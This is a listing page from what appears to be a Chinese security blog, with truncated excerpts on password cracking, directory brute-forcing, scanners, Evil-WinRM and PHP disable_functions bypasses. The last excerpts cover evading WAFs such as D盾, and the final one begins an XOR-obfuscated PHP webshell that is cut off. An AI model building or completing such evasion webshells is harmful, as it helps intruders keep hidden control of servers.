-
Ophcrack:基于彩虹表的Windows密码破解工具
ophcrack介绍Ophcrack是一款基于彩虹表的免费Windows密码破解工具。它带有图形用户界面,可在多个平台上运行(跨平台)。Windows密码破解Ophcrack特点可运行在Windows,Linux/Unix,MacOSX,...破解LM和NTLMhashes。可用于WindowsXP和Vista/7的免费彩虹表。用于简单密码的暴力破解模块。审核模式和CSV导出。用于分析密码的实时图… -
Findomain:使用证书透明度日志查找子域名的工具
Findomain介绍一个使用“证书透明度”日志查找子域名的工具。目前支持Linux,Windows和MacOS,所有支持的平台都是64位。Findomain子域名查找原理Findomain不使用子域名寻找的常规方法,而是使用证书透明度日志来查找子域,并且该方法使其工具更加快速和可靠。该工具使用多个公共API来执行搜索:CertspotterCrt.shVirustotal… -
w13scan:一款插件化基于流量分析的被动扫描器
w13scan介绍w13scan是一款插件化基于流量分析的扫描器,通过编写插件它会从访问流量中自动扫描,基于Python3。w13scan流程图w13scan安装与使用安装gitclone https://github.com/boy-hack/w13scan &cdw13scanpip3install-rrequirements.txtpython3main.py配置Http… -
WebPathBrute:一个Web目录扫描暴力探测工具
WebPathBrute介绍Windows下确实没有功能比较全又稳定的Web目录扫描暴力探测扫描工具了,此前用过破壳扫描器和dirburte都不稳定经常崩,御剑虽好,但是缺少很多小功能。WebPathBrute WEB目录暴力破解功能先说说并发线程数吧(多线程),虽然默认是20但是加大也无妨看你自己的各个参数设置和机器网络等配置了。超时时间自己视情况而定也不必多介绍了。三、这个随机xff… -
蚁剑AntSword命令执行增强:Bypass Disable Functions
蚁剑AntSwordBypassDisableFunctions在昨天,蚁剑AntSword更新了新姿势「BypassDisableFunctions」,提供了另一种攻击思路,我们来过一遍。原理分析基于蚁剑的 FastCGI/PHP-FPM 模式和 AntSword-Labs5 环境。蚁剑在服务器上传了1个so库和一个.antproxy.php,看下.ant… -
Konan – 高级Web目录扫描爆破工具,支持多线程/代理/字典/子目录等
Konan-Web目录扫描程序Konan是一个开源的用于Web目录扫描的工具,针对目录和文件名。类似的还有DirBuster,dirmap等。下面也对其它类似工具的功能对比。Konan目录扫描支持平台LinuxWindowsMacOSX同类工具功能对比功能Konandirsearchdirbgobuster多线程yesyesyesyes支持多扩展yesyesnonoHTTP代理支持yesyesye… -
Evil-WinRM:用于渗透测试的终极Windows远程管理shell
Evil-WinRMSHELLWinRM是什么?WinRM =WindowsRemoteManagement,即Windows远程管理,以下简称WinRM。Evil-WinRMshell介绍此shell是用于渗透测试的终极WinRMshell。WinRM(Windows远程管理)一种标准的基于SOAP的协议,允许来自不同供应商的硬件和操作系统进行互操作。此程序可以在任何启用此功能的Win… -
利用PHP反序列化免杀D盾、安全狗等WAF软件
PHP反序列化介绍在PHP进行反序列化时,会将序列化中的变量传入类中,并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾,过安全狗等WAF软件的效果。TestCode1:输出:xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}TestCode2: -
RapidScan – 自动化多工具Web漏洞扫描器
RapidScan漏洞扫描器以往进行安全检测时我们都需要一个接一个的运行安全扫描/审计工具,来收集信息以便进一步修复安全漏洞。但这样做效率太低了,能否实现自动化呢?即运行多个扫描工具来发现漏洞并合为一体,有效地判断误报,相互关联结果并节省宝贵的时间,RapidScan就是这样一款漏洞扫描器。RapidScan漏洞扫描器-帮助RapidScan漏洞扫描器-扫描RapidScan漏洞扫描器-输出报告功… -
免杀WebShell PHP一句话,过D盾
免杀PHP一句话过最新D盾等,webshell变量随机,增加流量传输编码方式免杀webshellPHP一句话 classLTDS{publicfunction__destruct(){$bxo='X'^"\x39";$woa='?'^"\x4c";$ukt='K'^"\x38";$gud='d'^"\x1";$fbu='_'^"\x2d";$agx='